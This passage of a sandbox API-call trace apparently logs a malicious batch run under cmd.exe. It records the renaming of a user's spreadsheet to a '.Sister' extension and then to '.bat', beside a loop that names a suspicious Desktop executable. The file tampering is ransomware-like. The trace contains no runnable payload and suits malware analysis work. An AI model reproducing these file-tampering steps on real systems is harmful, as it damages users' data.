ftLastWriteTime.dwLowDateTime=0xe11988a2, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8d65b90 [0306.216] FindClose (in: hFindFile=0x21ed8d65b90 | out: hFindFile=0x21ed8d65b90) returned 1 [0306.216] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0306.216] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\XVri3Ngsat8WaE.xlsx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1bf8580, ftCreationTime.dwHighDateTime=0x1d5d8d0, ftLastAccessTime.dwLowDateTime=0x46b9e450, ftLastAccessTime.dwHighDateTime=0x1d57fba, ftLastWriteTime.dwLowDateTime=0x46b9e450, ftLastWriteTime.dwHighDateTime=0x1d57fba, nFileSizeHigh=0x0, nFileSizeLow=0x15a8d, dwReserved0=0x4, dwReserved1=0x7, cFileName="XVri3Ngsat8WaE.xlsx", cAlternateFileName="XVRI3N~1.XLS")) returned 0x21ed8d65ad0 [0306.216] FindClose (in: hFindFile=0x21ed8d65ad0 | out: hFindFile=0x21ed8d65ad0) returned 1 [0306.217] _wcsnicmp (_String1="XVRI3N~1.XLS", _String2="XVri3Ngsat8WaE.xlsx", _MaxCount=0x13) returned 23 [0306.217] malloc (_Size=0x1ff9c) returned 0x21eda35fb40 [0306.217] ??_V@YAXPEAX@Z () returned 0x21eda35fb40 [0306.218] GetProcessHeap () returned 0x21ed8c70000 [0306.219] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8a50 [0306.219] ??_V@YAXPEAX@Z () returned 0x1 [0306.219] ??_V@YAXPEAX@Z () returned 0x1 [0306.219] GetProcessHeap () returned 0x21ed8c70000 [0306.219] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9477be0, Size=0x1a8) returned 0x21ed9477be0 [0306.219] GetProcessHeap () returned 0x21ed8c70000 [0306.219] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9477be0) returned 0x1a8 [0306.219] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0306.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.219] GetFileType (hFile=0x50) returned 0x2 [0306.219] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.219] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0306.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.220] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0306.227] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.227] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0306.228] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0306.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.228] GetFileType (hFile=0x50) returned 0x2 [0306.228] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.228] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0306.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.228] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0306.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.229] GetFileType (hFile=0x50) returned 0x2 [0306.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.229] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.229] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9477710*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9477710*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.229] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"XVri3Ngsat8WaE.xlsx\" \"XVri3Ngsat8WaE.xlsx.Sister\" ") returned 52 [0306.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.230] GetFileType (hFile=0x50) returned 0x2 [0306.230] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.230] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.230] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.230] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x34) returned 1 [0306.231] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0306.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.231] GetFileType (hFile=0x50) returned 0x2 [0306.231] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.231] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.231] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.232] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0306.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.232] GetFileType (hFile=0x50) returned 0x2 [0306.232] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.232] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.232] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.232] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0306.233] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0306.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.233] GetFileType (hFile=0x50) returned 0x2 [0306.233] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.233] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.233] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0306.234] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0306.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.234] GetFileType (hFile=0x50) returned 0x2 [0306.234] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.234] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.234] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.234] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0306.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.240] GetFileType (hFile=0x50) returned 0x2 [0306.240] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.240] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.241] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9477bb0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9477bb0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.241] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"XVri3Ngsat8WaE.xlsx.Sister\" \"XVri3Ngsat8WaE.bat\" ") returned 51 [0306.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.241] GetFileType (hFile=0x50) returned 0x2 [0306.241] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.241] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.242] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x33) returned 1 [0306.242] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0306.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.242] GetFileType (hFile=0x50) returned 0x2 [0306.242] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.242] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0306.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.242] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0306.246] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.247] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0306.247] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0306.247] malloc (_Size=0xffce) returned 0x21eda35fb40 [0306.247] ??_V@YAXPEAX@Z () returned 0x21eda35fb40 [0306.247] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0306.247] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0306.247] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0306.247] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0306.247] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0306.247] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0306.247] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0306.247] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0306.247] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0306.247] ??_V@YAXPEAX@Z () returned 0x1 [0306.247] GetProcessHeap () returned 0x21ed8c70000 [0306.247] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe0) returned 0x21ed8c95c40 [0306.247] GetProcessHeap () returned 0x21ed8c70000 [0306.247] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95c40, Size=0x78) returned 0x21ed8c95c40 [0306.247] GetProcessHeap () returned 0x21ed8c70000 [0306.247] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95c40) returned 0x78 [0306.247] GetProcessHeap () returned 0x21ed8c70000 [0306.247] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x80) returned 0x21ed9379780 [0306.248] GetProcessHeap () returned 0x21ed8c70000 [0306.248] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe0) returned 0x21ed8d6bfe0 [0306.248] GetProcessHeap () returned 0x21ed8c70000 [0306.248] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6bfe0, Size=0x78) returned 0x21ed8d6bfe0 [0306.248] GetProcessHeap () returned 0x21ed8c70000 [0306.248] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6bfe0) returned 0x78 [0306.248] malloc (_Size=0xffce) returned 0x21eda35fb40 [0306.248] ??_V@YAXPEAX@Z () returned 0x21eda35fb40 [0306.248] GetProcessHeap () returned 0x21ed8c70000 [0306.248] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65650 [0306.248] GetProcessHeap () returned 0x21ed8c70000 [0306.248] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9371d20 [0306.248] _wcsicmp (_String1="XVri3Ngsat8WaE.xlsx", _String2=".") returned 74 [0306.248] _wcsicmp (_String1="XVri3Ngsat8WaE.xlsx", _String2="..") returned 74 [0306.248] GetFileAttributesW (lpFileName="XVri3Ngsat8WaE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\xvri3ngsat8wae.xlsx")) returned 0x20 [0306.249] GetProcessHeap () returned 0x21ed8c70000 [0306.249] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9477da0 [0306.250] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9477db0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.250] SetErrorMode (uMode=0x0) returned 0x0 [0306.250] SetErrorMode (uMode=0x1) returned 0x0 [0306.250] GetFullPathNameW (in: lpFileName="XVri3Ngsat8WaE.xlsx", nBufferLength=0x7fe7, lpBuffer=0x21eda35fb40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\XVri3Ngsat8WaE.xlsx", lpFilePart=0xa6cf4fd660*="XVri3Ngsat8WaE.xlsx") returned 0x2d [0306.250] SetErrorMode (uMode=0x0) returned 0x1 [0306.250] GetProcessHeap () returned 0x21ed8c70000 [0306.250] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9488ef0 [0306.251] _wcsicmp (_String1="XVri3Ngsat8WaE.xlsx", _String2=".") returned 74 [0306.251] _wcsicmp (_String1="XVri3Ngsat8WaE.xlsx", _String2="..") returned 74 [0306.251] GetFileAttributesW (lpFileName="XVri3Ngsat8WaE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\xvri3ngsat8wae.xlsx")) returned 0x20 [0306.251] ??_V@YAXPEAX@Z () returned 0x1 [0306.251] malloc (_Size=0xffce) returned 0x21eda35fb40 [0306.251] ??_V@YAXPEAX@Z () returned 0x21eda35fb40 [0306.251] malloc (_Size=0xffce) returned 0x21eda36fb20 [0306.251] ??_V@YAXPEAX@Z () returned 0x21eda36fb20 [0306.252] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\XVri3Ngsat8WaE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\xvri3ngsat8wae.xlsx")) returned 0x20 [0306.252] malloc (_Size=0xffce) returned 0x21ed993f900 [0306.252] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0306.252] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\XVri3Ngsat8WaE.xlsx", fInfoLevelId=0x1, lpFindFileData=0x21ed9371d30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9371d30) returned 0x21ed8d65590 [0306.253] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0306.253] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0306.253] ??_V@YAXPEAX@Z () returned 0x1 [0306.253] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\XVri3Ngsat8WaE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\xvri3ngsat8wae.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\XVri3Ngsat8WaE.xlsx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\xvri3ngsat8wae.xlsx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0306.254] FindNextFileW (in: hFindFile=0x21ed8d65590, lpFindFileData=0x21ed9371d30 | out: lpFindFileData=0x21ed9371d30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1bf8580, ftCreationTime.dwHighDateTime=0x1d5d8d0, ftLastAccessTime.dwLowDateTime=0x46b9e450, ftLastAccessTime.dwHighDateTime=0x1d57fba, ftLastWriteTime.dwLowDateTime=0x46b9e450, ftLastWriteTime.dwHighDateTime=0x1d57fba, nFileSizeHigh=0x0, nFileSizeLow=0x15a8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="XVri3Ngsat8WaE.xlsx", cAlternateFileName="")) returned 0 [0306.255] GetLastError () returned 0x12 [0306.255] FindClose (in: hFindFile=0x21ed8d65590 | out: hFindFile=0x21ed8d65590) returned 1 [0306.256] ??_V@YAXPEAX@Z () returned 0x1 [0306.256] ??_V@YAXPEAX@Z () returned 0x1 [0306.256] ??_V@YAXPEAX@Z () returned 0x1 [0306.256] ??_V@YAXPEAX@Z () returned 0x1 [0306.256] GetProcessHeap () returned 0x21ed8c70000 [0306.256] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d662b0 [0306.256] GetProcessHeap () returned 0x21ed8c70000 [0306.256] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c958c0, Size=0x16) returned 0x21ed8c955a0 [0306.256] GetProcessHeap () returned 0x21ed8c70000 [0306.256] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c955a0) returned 0x16 [0306.256] GetProcessHeap () returned 0x21ed8c70000 [0306.256] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e90, Size=0x20) returned 0x21ed8d45b30 [0306.256] GetProcessHeap () returned 0x21ed8c70000 [0306.256] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45b30) returned 0x20 [0306.256] GetProcessHeap () returned 0x21ed8c70000 [0306.256] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61500 [0306.257] GetProcessHeap () returned 0x21ed8c70000 [0306.257] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61500, Size=0xb2) returned 0x21ed93751b0 [0306.257] GetProcessHeap () returned 0x21ed8c70000 [0306.257] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93751b0) returned 0xb2 [0306.257] GetProcessHeap () returned 0x21ed8c70000 [0306.257] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d39790 [0306.257] GetProcessHeap () returned 0x21ed8c70000 [0306.257] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d39790, Size=0x30) returned 0x21ed8d39790 [0306.257] GetProcessHeap () returned 0x21ed8c70000 [0306.257] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d39790) returned 0x30 [0306.258] GetProcessHeap () returned 0x21ed8c70000 [0306.258] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d397d0 [0306.258] malloc (_Size=0x1ff9c) returned 0x21eda35fb40 [0306.258] GetProcessHeap () returned 0x21ed8c70000 [0306.258] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93754b0 [0306.258] GetProcessHeap () returned 0x21ed8c70000 [0306.258] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed9375ab0 [0306.259] ??_V@YAXPEAX@Z () returned 0x1 [0306.259] malloc (_Size=0x1ff9c) returned 0x21eda35fb40 [0306.259] GetProcessHeap () returned 0x21ed8c70000 [0306.259] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9374d30 [0306.259] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda35fb40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0306.259] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d66370 [0306.259] FindClose (in: hFindFile=0x21ed8d66370 | out: hFindFile=0x21ed8d66370) returned 1 [0306.259] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65a10 [0306.260] FindClose (in: hFindFile=0x21ed8d65a10 | out: hFindFile=0x21ed8d65a10) returned 1 [0306.260] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d660d0 [0306.260] FindClose (in: hFindFile=0x21ed8d660d0 | out: hFindFile=0x21ed8d660d0) returned 1 [0306.260] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0306.261] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.261] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0306.261] GetProcessHeap () returned 0x21ed8c70000 [0306.261] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d39450 [0306.261] ??_V@YAXPEAX@Z () returned 0x1 [0306.261] ??_V@YAXPEAX@Z () returned 0x1 [0306.261] GetProcessHeap () returned 0x21ed8c70000 [0306.261] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d397d0, Size=0x490) returned 0x21ed8d397d0 [0306.261] GetProcessHeap () returned 0x21ed8c70000 [0306.261] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d397d0) returned 0x490 [0306.261] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0306.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.261] GetFileType (hFile=0x50) returned 0x2 [0306.261] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.261] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0306.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.265] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0306.269] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.270] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0306.270] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0306.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.270] GetFileType (hFile=0x50) returned 0x2 [0306.270] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.270] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0306.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.270] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, 